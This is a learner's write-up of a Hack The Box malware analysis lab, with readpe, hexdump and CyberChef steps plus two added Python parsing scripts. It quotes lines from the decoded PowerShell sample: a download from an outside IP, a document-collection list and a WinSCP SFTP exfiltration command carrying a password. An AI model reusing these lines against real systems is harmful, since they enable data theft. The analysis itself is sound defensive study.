Heartbreaker-Continuum
Hack the Box Malware Analysis Lab
Introduction
This is the first piece of malware I have ever analysed. I am using my VM to extract and view the malware sample.

Question 1: To accurately reference and identify the suspicious binary, please provide its SHA256 hash.
Answer: In my terminal I ran the sha256sum command to grab its hash.
└─$ sha256sum Superstar_MemberCard.tiff.exe
12daa34111bb54b3dcbad42305663e44e7e6c3842f015cccbbe6564d9dfd3ea3 Superstar_MemberCard.tiff.exe

Question 2: When was the binary file originally created, according to its metadata (UTC)?
Answer: Since it's my first time doing this kind of analysis, I looked up how to pull as much metadata as possible out of a file. I needed to install readpe, then ran it against the file to get the date and time stamp.
└─$ readpe Superstar_MemberCard.tiff.exe
DOS Header
Magic number: 0x5a4d (MZ)
Bytes in last page: 144
Pages in file: 3
Relocations: 0
Size of header in paragraphs: 4
Minimum extra paragraphs: 0
Maximum extra paragraphs: 65535
Initial (relative) SS value: 0
Initial SP value: 0xb8
Initial IP value: 0
Initial (relative) CS value: 0
Address of relocation table: 0x40
Overlay number: 0
OEM identifier: 0
OEM information: 0
PE header offset: 0x80
PE header
Signature: 0x00004550 (PE)
COFF/File header
Machine: 0x14c IMAGE_FILE_MACHINE_I386
Number of sections: 3
Date/time stamp: 1710326286 (Wed, 13 Mar 2024 10:38:06 UTC)
Symbol Table offset: 0
Number of symbols: 0
Size of optional header: 0xe0
Characteristics: 0x102
Characteristics names
IMAGE_FILE_EXECUTABLE_IMAGE
IMAGE_FILE_32BIT_MACHINE
Optional/Image header
Magic number: 0x10b (PE32)
Linker major version: 11
Linker minor version: 0
Size of .text section: 0x9600
Size of .data section: 0x800
Size of .bss section: 0
Entrypoint: 0xb50e
Address of .text section: 0x2000
Address of .data section: 0xc000
ImageBase: 0x400000
Alignment of sections: 0x2000
Alignment factor: 0x200
Major version of required OS: 4
Minor version of required OS: 0
Major version of image: 0
Minor version of image: 0
Major version of subsystem: 4
Minor version of subsystem: 0
Win32 version value: 0
Overwrite OS major version: (default)
Overwrite OS minor version: (default)
Overwrite OS build number: (default)
Overwrite OS platform id: (default)
Size of image: 0x10000
Size of headers: 0x200
Checksum: 0
Subsystem required: 0x2 (IMAGE_SUBSYSTEM_WINDOWS_GUI)
DLL characteristics: 0x8540
DLL characteristics names
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
IMAGE_DLLCHARACTERISTICS_NX_COMPAT
IMAGE_DLLCHARACTERISTICS_NO_SEH
IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE
Size of stack to reserve: 0x100000
Size of stack to commit: 0x1000
Size of heap space to reserve: 0x100000
Size of heap space to commit: 0x1000
Loader Flags: 0
Loader Flags names
Data directories
Directory
IMAGE_DIRECTORY_ENTRY_IMPORT: 0xb4bc (79 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_RESOURCE: 0xc000 (1312 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_BASERELOC: 0xe000 (12 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_IAT: 0x2000 (8 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: 0x2008 (72 bytes)
Imported functions
Library
Name: mscoree.dll
Functions
Function
Hint: 0
Name: _CorExeMain
Exported functions
Sections
Section
Name: .text
Virtual Size: 0x9514 (38164 bytes)
Virtual Address: 0x2000
Size Of Raw Data: 0x9600 (38400 bytes)
Pointer To Raw Data: 0x200
Number Of Relocations: 0
Characteristics: 0x60000020
Characteristic Names
IMAGE_SCN_CNT_CODE
IMAGE_SCN_MEM_EXECUTE
IMAGE_SCN_MEM_READ
Section
Name: .rsrc
Virtual Size: 0x520 (1312 bytes)
Virtual Address: 0xc000
Size Of Raw Data: 0x600 (1536 bytes)
Pointer To Raw Data: 0x9800
Number Of Relocations: 0
Characteristics: 0x40000040
Characteristic Names
IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_READ
Section
Name: .reloc
Virtual Size: 0xc (12 bytes)
Virtual Address: 0xe000
Size Of Raw Data: 0x200 (512 bytes)
Pointer To Raw Data: 0x9e00
Number Of Relocations: 0
Characteristics: 0x42000040
Characteristic Names
IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_DISCARDABLE
IMAGE_SCN_MEM_READ

Question 3: Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?
Answer: Using the same readpe output, I looked at the .text section itself rather than the header sizes. Its Size Of Raw Data is 0x9600, giving an answer of 38400 bytes.
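Both the Question 2 timestamp and this code size come straight from the PE headers. As an added example (not part of the original write-up or the lab), here is a plain-Python parser for those fields, run against a constructed stub carrying the values readpe printed above rather than the real sample; for a real file, replace build_sample_pe() with the file's bytes.

```python
import struct
from datetime import datetime, timezone

SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes
COFF_FMT = "<HHIIIHH"          # IMAGE_FILE_HEADER, 20 bytes

def build_sample_pe() -> bytes:
    """Constructed stub (not the real sample) with the values readpe printed above."""
    dos = bytearray(0x80)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                      # e_lfanew -> 0x80
    coff = struct.pack(COFF_FMT, 0x14C, 3, 1710326286, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    def sec(name, vsize, va, rawsize, rawptr, chars):
        return struct.pack(SECTION_FMT, name, vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)
    secs = (sec(b".text", 0x9514, 0x2000, 0x9600, 0x200, 0x60000020)
            + sec(b".rsrc", 0x520, 0xC000, 0x600, 0x9800, 0x40000040)
            + sec(b".reloc", 0xC, 0xE000, 0x200, 0x9E00, 0x42000040))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + secs

def parse_pe(data: bytes) -> dict:
    """Read the COFF timestamp and the section table the way readpe reports them."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsec, stamp, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, data, coff)
    sections = {}
    table = coff + struct.calcsize(COFF_FMT) + opt_size          # first section header
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, *_, chars = struct.unpack_from(
            SECTION_FMT, data, table + i * struct.calcsize(SECTION_FMT))
        sections[name.rstrip(b"\0").decode()] = {
            "virtual_size": vsize, "va": va, "raw_size": rawsize, "raw_ptr": rawptr, "flags": chars}
    when = datetime.fromtimestamp(stamp, tz=timezone.utc)
    return {"machine": machine, "timestamp": stamp,
            "compiled_utc": when.strftime("%a, %d %b %Y %H:%M:%S UTC"), "sections": sections}

def code_size(info: dict) -> int:
    """Bytes of code on disk: raw sizes of sections flagged IMAGE_SCN_CNT_CODE (0x20)."""
    return sum(s["raw_size"] for s in info["sections"].values() if s["flags"] & 0x20)

if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    print(info["compiled_utc"], code_size(info))   # Wed, 13 Mar 2024 10:38:06 UTC 38400
```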
Exported functions
Sections
Section
Name: .text
Virtual Size: 0x9514 (38164 bytes)
Virtual Address: 0x2000
Size Of Raw Data: 0x9600 (38400 bytes)
Pointer To Raw Data: 0x200
Number Of Relocations: 0
Characteristics: 0x60000020
Characteristic Names
IMAGE_SCN_CNT_CODE
IMAGE_SCN_MEM_EXECUTE
IMAGE_SCN_MEM_READ

Question 4: It appears that the binary may have undergone a file conversion process. Could you determine its original filename?
Answer: Finding a binary's original file name was also something I had never done before. After some research, it looked like the strings command might give me the answer.
get_State
get_Reason
CompilerGeneratedAttribute
newILY.ps1
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
There is the name of a .ps1 file among the strings of the binary. This seems to be the original name.
Question 5: Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary.
Answer: Obfuscated code is commonly produced by writing the script and then Base64-encoding it before embedding it in the file. Using the hexdump command with the -C argument, I can look for a region that appears obfuscated.
└─$ hexdump -C Superstar_MemberCard.tiff.exe
The output around the seemingly obfuscated code was the following:
00002c50 00 70 28 27 00 00 0a 6f 28 00 00 0a 28 a6 00 00 |.p('...o(...(...|
00002c60 0a 73 1c 01 00 0a 7a 1e 02 28 11 00 00 0a 2a 00 |.s....z..(....*.|
00002c70 36 1e 00 00 24 73 43 72 74 20 3d 20 22 3d 3d 67 |6...$sCrt = "==g|
00002c80 43 4e 55 32 59 79 39 6d 52 74 41 53 5a 7a 4a 58 |CNU2Yy9mRtASZzJX|
00002c90 64 6a 56 6d 55 74 41 69 63 70 52 45 64 6c 64 6d |djVmUtAicpREdldm|
00002ca0 63 68 52 48 4a 67 67 47 64 68 42 56 4c 67 30 57 |chRHJggGdhBVLg0W|
The third line is where the content turns into a jumbled run of characters. The $sCrt string starts at the ninth hex digit of that row, i.e. four bytes in, so the hexadecimal offset at the start of this code is 0x2c70 + 4 = 2c74.
Question 6: The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation?
Answer: The main body of the script seems to start after the obfuscated section I found earlier, since the upper half of the hex dump is the file header. Scrolling down a little, I looked for any mention of text handling or an encoding method.
000049f0 3d 20 5b 73 59 73 54 65 4d 2e 74 45 78 54 2e 65 |= [sYsTeM.tExT.e|
00004a00 4e 63 4f 64 49 6e 47 5d 3a 3a 75 54 66 38 2e 47 |NcOdInG]::uTf8.G|
00004a10 65 54 73 54 72 49 6e 47 28 5b 73 59 73 54 65 4d |eTsTrInG([sYsTeM|
00004a20 2e 63 4f 6e 56 65 52 74 5d 3a 3a 66 52 6f 4d 62 |.cOnVeRt]::fRoMb|
00004a30 41 53 65 36 34 73 54 72 49 6e 47 28 22 24 65 6e |ASe64sTrInG("$en|
There are a couple of interesting things here: the call to fRoMbASe64sTrInG (System.Convert::FromBase64String), whose output is passed to GeTsTrInG to turn the decoded bytes back into text. The script is Base64-encoded, giving us our answer.
Question 7: What is the specific cmdlet utilized that was used to initiate file downloads?
Answer: I had never done anything like this before, so after some research I found that a tool such as CyberChef can decode the Base64 and turn it into something more legible.
I selected the Reverse recipe followed by From Base64 to make the code readable. Now I can go hunting for my answer. The very top of the decoded file held it.
Invoke-WebRequest -Uri $url -OutFile $img
The Invoke-WebRequest cmdlet is the answer. It takes a URL and an output file, meaning it can initiate downloads.
Question 8: Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order.
Answer: This was rather simple: I looked for the IP addresses the malware wants to connect to.
open sftp://service:M8&C!i6KkmGL1-#@35.169.66.138/ -hostkey=*
$url = "http://44.206.187.144:9000/Superstar_MemberCard.tiff"
In ascending order, the network IoCs are 35.169.66.138,44.206.187.144.

Question 9: The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored?
Answer: There were a few file paths in the malware, but the script writes the harvested user data, as .txt files, into a directory held in a variable called $targetDir.
$searchDir = "C:\Users"
$targetDir = "C:\Users\Public\Public Files"
if (-not (Test-Path -Path $targetDir -PathType Container)) {
New-Item -ItemType Directory -Path $targetDir -Force | Out-Null
}

Question 10: What MITRE ID corresponds to the technique used by the malicious binary to autonomously gather data?
Answer: Looking through the code it was pretty clear that the malware wants to search for specific files with the following extensions:
$extList = "*.doc", "*.docx", "*.xls", "*.xlsx", "*.ppt", "*.pptx", "*.pdf", "*.csv", ".*oft", "*.potx",
"*.xltx", "*.dotx", "*.msg", "*.eml", "*.pst", "*.odt", "*.ods", "*.odp", "*.odg", "*.ost"
This means the malware falls under MITRE ID T1119, Automated Collection.
Question 11: What is the password utilized to exfiltrate the collected files through the file transfer program within the binary?
Answer: One line of code stood out to me here. The malware opens an SFTP session with the username service and the password M8&C!i6KkmGL1-# to the address 35.169.66.138, pointing to an obvious exfiltration route for the data.
$wExePath = "$wExtractPath\WinSCP.com"
$sPath = "$wExtractPath\maintenanceScript.txt"
@"
open sftp://service:M8&C!i6KkmGL1-#@35.169.66.138/ -hostkey=*
put `"$archivePath`"
close
exit
"@ | Out-File -FilePath $sPath -Force
Start-Process -FilePath $wExePath -ArgumentList "/script=`"$sPath`"" -Wait -NoNewWindow
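The steps from Questions 5 to 9 (find the $sCrt marker, take its offset, reverse and Base64-decode the blob, then pull out the IoCs) can be scripted. This is an added example, not code from the write-up or the lab: it runs on a constructed stand-in file that places the marker at 0x2c74 and contains only values already quoted above, with the SFTP password replaced by a placeholder; the marker string, regexes and sample script are my assumptions, not the lab's.

```python
import base64
import ipaddress
import re

MARKER = b'$sCrt = "'   # literal seen in the hexdump just before the encoded blob

def find_script_offset(data: bytes) -> int:
    """Offset of the '$' that opens the embedded script (the Question 5 value)."""
    return data.index(MARKER)           # ValueError if the marker is absent

def extract_encoded(data: bytes) -> bytes:
    """Return the quoted blob that follows the marker, up to its closing quote."""
    start = find_script_offset(data) + len(MARKER)
    return data[start:data.index(b'"', start)]

def decode_script(blob: bytes) -> str:
    """Undo the obfuscation used in CyberChef: reverse, then Base64-decode."""
    return base64.b64decode(blob[::-1], validate=True).decode("utf-8")

def extract_iocs(script: str) -> dict:
    """Pull network IoCs, the download cmdlet and the staging directory from the script."""
    ips = set()
    for cand in re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", script):
        try:
            ips.add(ipaddress.ip_address(cand))   # drops non-addresses such as 999.1.2.3
        except ValueError:
            pass
    staging = re.search(r'\$targetDir\s*=\s*"([^"]*)"', script)
    return {
        "ips": ",".join(str(ip) for ip in sorted(ips)),          # ascending, numeric order
        "urls": re.findall(r'https?://[^\s"]+', script),
        "sftp_hosts": re.findall(r"sftp://[^@\s]*@([^/\s]+)", script),
        "download_cmds": re.findall(r"Invoke-WebRequest[^\r\n]*", script),
        "staging_dir": staging.group(1) if staging else None,
    }

# Constructed stand-in for the decoded script: only lines quoted in this write-up,
# with the SFTP password replaced by a placeholder.
SAMPLE_SCRIPT = "\n".join([
    '$url = "http://44.206.187.144:9000/Superstar_MemberCard.tiff"',
    "Invoke-WebRequest -Uri $url -OutFile $img",
    '$targetDir = "C:\\Users\\Public\\Public Files"',
    "open sftp://service:PASSWORD_PLACEHOLDER@35.169.66.138/ -hostkey=*",
])

def build_sample_binary() -> bytes:
    """Constructed file: filler bytes, then the marker at 0x2c74 as in the real sample."""
    blob = base64.b64encode(SAMPLE_SCRIPT.encode())[::-1]
    return b"MZ" + b"\x00" * 0x2C72 + MARKER + blob + b'"\r\n' + b"\x00" * 16
```

Running extract_iocs(decode_script(extract_encoded(build_sample_binary()))) on the stand-in returns the IP list, URL, SFTP host, download cmdlet and staging directory answered above.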
Conclusion
This was my first attempt at malware analysis. It took quite a bit of research and I learnt a lot along the way. I hope I can get my hands on more of these and expand my knowledge further; this is a major interest of mine within cybersecurity.